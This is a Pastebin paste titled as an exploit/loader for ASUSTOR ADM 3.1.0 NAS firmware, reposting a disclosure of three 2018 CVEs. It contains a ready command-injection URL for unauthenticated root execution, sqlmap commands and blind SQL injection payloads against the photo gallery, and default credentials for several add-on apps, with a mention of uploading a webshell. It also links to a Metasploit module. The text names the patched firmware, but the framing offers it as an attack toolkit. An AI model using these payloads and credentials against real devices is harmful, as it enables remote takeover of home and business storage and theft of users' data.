daily pastebin goal
21%
SHARE
TWEET

[ASUSTOR ADM ROUTER 3.1.0 EXPLOIT/LOADER]

xB4ckdoorREAL Nov 7th, 2018 116 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #Discord: https://discord.gg/QDy3bUy or skype: b4ckdoor.porn
  2.  
  3. Product - ASUSTOR ADM - 3.1.0.RFQ3 and all previous builds
  4. Vendor - https://www.asustor.com/
  5. Patch Notes - http://download.asustor.com/download/docs/releasenotes/RN_ADM_3.1.3.RHU2.pdf
  6.  
  7. Issue:  The Asustor NAS appliance on ADM 3.1.0 and before suffer from
  8. multiple critical vulnerabilities. The vulnerabilities were submitted
  9. to Asustor in January and February 2018. Several follow-up requests
  10. were made in an attempt to obtain vendor acknowledgement, however no
  11. correspondance was ever received. Nevertheless, the vendor did patch
  12. the RCE issue in the 3.1.3 ADM release on May 31, 2018.
  13.  
  14. Resolution: Upgrade to newest Asustor firmware, ADM 3.1.3.
  15. -----------------------------------------------------------------------------------
  16.  
  17. CVE-2018-11510
  18. Remote Command Execution (Unauthenticated)
  19. CWE-78 - Improper Neutralization of Special Elements used in an OS Command
  20. ASUSTOR ADM - 3.1.0.RFQ3
  21. ------------------------------------------
  22.  
  23. Weakness : The ASUSTOR ADM 3.1.0.RFQ3 NAS portal suffers from an
  24. unauthenticated remote code execution vulnerability in the
  25. portal/apis/aggrecate_js.cgi file by embedding OS commands in the
  26. 'script' parameter. The application fails to santitize user input
  27. after the cgi file executes a call to a local shell script.
  28.  
  29. Example POC:
  30. https://<IP>:8001/portal/apis/aggrecate_js.cgi?script=launcher%22%26ls%20-ltr%26%22
  31.  
  32. Exploitation of this vulnerability allows an attacker execution of
  33. arbitrary commands on the host operating system, as the root user,
  34. remotely and unauthenticated. This is a complete compromise of the
  35. appliance.
  36.  
  37. Exploits with Metasploit module can be found here:
  38. https://github.com/mefulton/CVE-2018-11510/
  39. ------------------------------------------------------------------------------------
  40.  
  41. CVE-2018-11511
  42. Blind SQL Injections
  43. CWE-89: Improper Neutralization of Special Elements used in an SQL Command
  44. ASUSTOR Photo Gallery Application - ADM 3.1.0.RFQ3
  45. ------------------------------------------
  46.  
  47. Weakness : The tree list functionality in the photo gallery
  48. application in ASUSTOR ADM 3.1.0.RFQ3 has a SQL injection
  49. vulnerability that affects the 'album_id' or 'scope' parameter via a
  50. photo-gallery/api/album/tree_lists/ URI.
  51.  
  52. POC
  53. sqlmap -u "https://<IP>/photo-gallery/api/album/tree_lists/"
  54. --data="album_id=123456789&start=0&limit=100&order=name_asc&api=v2"
  55.   --random-agent --risk=2 --dbms=mysql
  56.  
  57. Parameter: album_id (POST)
  58.     Type: boolean-based blind
  59.     Title: AND boolean-based blind - WHERE or HAVING clause
  60.     Payload: album_id=106299411 AND
  61. 4644=4644&start=0&limit=100&order=name_asc&api=v2
  62.  
  63.     Type: AND/OR time-based blind
  64.     Title: MySQL >= 5.0.12 AND time-based blind
  65.     Payload: album_id=106299411 AND
  66. SLEEP(5)&start=0&limit=100&order=name_asc&api=v2
  67.  
  68.  
  69. sqlmap -u "https://IP/photo-gallery/api/photo/search/"
  70. --data="keyword=jpg&scope=123456789&start=0&limit=100&order=name_asc&api_mode=browse&api=v2"
  71. --random-agent --dbms=mysql --risk=2
  72.  
  73. Parameter: scope (POST)
  74.     Type: AND/OR time-based blind
  75.     Title: MySQL >= 5.0.12 AND time-based blind
  76.     Payload: keyword=jpg&scope=106299414 AND
  77. SLEEP(5)&start=0&limit=100&order=name_asc&api_mode=browse&api=v2
  78. ------------------------------------------------------------------------------------
  79.  
  80. CVE-2018-11509
  81. Default credentials and remote access (Multiple Applications)
  82. CWE-255 Credentials Management
  83. ASUSTOR ADM 3.1.0.RFQ3
  84. ------------------------------------------
  85.  
  86. Weakness : When the end user completes setup for the ASUSTOR Nas
  87. appliance, a single congratulations web page appears, usually on port
  88. 80, stating setup is complete. This "setup complete" web page however
  89. is served publicly, and is available to anyone with no authentication.
  90. >From this page it is possible to access all of the add-on applications
  91. the end usr installs on the NAS, which are available from their online
  92. repository, by simply browsing to each add-on directory.
  93.  
  94. For many of these apps, for example phpmyadmin. virtualbox, owncloud,
  95. photo-gallery, etc., the files are installed under the /volume1/Web/
  96. folder, which is t the same directory as the 'setup complete' page is
  97. located.
  98.  
  99. URL http://<IP>/phpmyadmin/ username/password - root:admin
  100. URL http://<IP>/virtualbox/ username/password - admin:admin
  101. URL http://<IP>/wordpress/ setup file available
  102.  
  103. The application does prompt the user to change the admin account for
  104. the NAS itself, however, the end user is never prompted to change the
  105. default passwords on the add-on  applications.
  106.  
  107. This allows an attacker root level access to the application which in
  108. turn can be used to upload a webshell onto the appliance. It also
  109. allow access to all data the end user uploads to the NAS.
  110.  
  111. Furthermore, the NAS itself has a default account nvradmin, which has
  112. permission to log into the admin portal. While the nvradmin account
  113. does not have most admin permissions, it still allows an attacker to
  114. access many of the browser file functions, and gain a foothold on the
  115. appliance.
  116.  
  117. URL http://<IP>:8001/portal/ username/password nvradmin:nvradmin
  118.  
  119. An attacker can determine installed applications and attack default
  120. credentials that are not changed upon NAS initialization, which
  121. enables them to  compromise end user data or gain root access on the
  122. appliance.
  123. -----------------------------------------------------------------------------------
  124.  
  125.  
  126. #  [2018-11-07]  #
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top